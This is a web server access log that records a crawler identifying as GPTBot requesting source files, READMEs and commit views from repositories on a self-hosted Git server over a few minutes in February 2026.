[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include" +[17/Feb/2026:15:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:15:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Footer.tsx" +[17/Feb/2026:15:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" +[17/Feb/2026:15:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16486] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Contact.tsx" +[17/Feb/2026:15:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13940] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" +[17/Feb/2026:15:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" +[17/Feb/2026:15:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" +[17/Feb/2026:15:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14827] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx" +[17/Feb/2026:15:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14671] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" +[17/Feb/2026:15:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 10140] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:15:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:15:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:15:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:15:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" +[17/Feb/2026:15:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" +[17/Feb/2026:15:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" +[17/Feb/2026:15:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14214] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Footer.tsx" +[17/Feb/2026:15:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14828] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" +[17/Feb/2026:15:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" +[17/Feb/2026:15:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15559] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" +[17/Feb/2026:15:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13890] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" +[17/Feb/2026:15:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16486] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Contact.tsx" +[17/Feb/2026:15:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13941] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" +[17/Feb/2026:15:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14672] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" +[17/Feb/2026:15:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 10088] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" +[17/Feb/2026:15:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 11133] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Footer.tsx" +[17/Feb/2026:15:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 15193] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:15:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13349] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" +[17/Feb/2026:15:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12227] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore" +[17/Feb/2026:15:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8509] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" +[17/Feb/2026:15:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" +[17/Feb/2026:15:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12013] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:15:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:15:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" +[17/Feb/2026:15:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 10313] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 15768] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site" [Client 74.7.227.38] [Length 9957] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9968] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:15:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" +[17/Feb/2026:15:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:15:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16259] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:15:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10834] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10830] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include" +[17/Feb/2026:15:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 9966] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:15:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:15:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 17255] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 